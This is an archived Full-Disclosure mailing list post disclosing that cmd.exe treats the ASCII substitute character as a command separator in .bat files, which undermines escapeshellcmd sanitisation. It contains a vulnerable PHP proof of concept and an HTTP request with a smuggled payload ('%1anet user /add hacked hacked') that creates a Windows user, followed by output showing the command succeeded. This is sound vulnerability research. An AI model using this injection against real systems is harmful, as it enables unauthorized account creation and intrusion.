lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 11 Nov 2016 21:49:07 +0000
From: Julian Horoszkiewicz <ewilded@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Unexpected behavior of cmd.exe while processing .bat files
 leads to potential command injection vulnerabilities

Unexpected behavior of cmd.exe while processing .bat files leads to
potential command injection vulnerabilities
Tested on: Windows 7, Windows 10
Author: Julian Horoszkiewicz

It was discovered that cmd.exe, when processing .bat files, treats the
ASCII substitute character (code 26) as a command separator (like & or |).
This opens the way for unexpected command injection vulnerabilities in
applications which generate .bat files based on user input, as this
character is not filtered by most application input sanitisers against
command injection.

PoC:
Let's assume the following PHP script (note the use of well known
escapeshellcmd() function, known as a safe way to sanitise user input
before using it as a command argument):
<?php
    $command = 'dir '.$_POST['dir'];
    $escaped_command = escapeshellcmd($command);
    file_put_contents('out.bat',$escaped_command);
    system('out.bat');
?>

Let's send a request containing "." as a parameter to the hardcoded "dir"
command, appended with another command - taking advantage of %1a as a
command separator:
POST /escape_shell_cmd.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101
Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

dir=.%1anet user /add hacked hacked


The response:
HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP
Content-Length: 977
Connection: close
Content-Type: text/html; charset=UTF-8

C:\wamp64\www>dir .
 Volume in drive C has no label.
 Volume Serial Number is 22C1-AD4C

 Directory of C:\wamp64\www

24.07.2016  17:22    <DIR>          .
24.07.2016  17:22    <DIR>          ..
[...]

C:\wamp64\www>net user /add hacked hacked
Command executed successfully.

To double check, we look the new user up in the command line once again:

C:\Users\win>net user hacked
User name                  hacked
Full name
[...]

So, it seems that every piece of software generating .bat files from user
input is potentially vulnerable - it does not pertain to PHP and
escapeshellcmd specifically, but rather to cmd.exe itself.
More on alternative command injection payloads:
https://github.com/ewilded/shelling

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ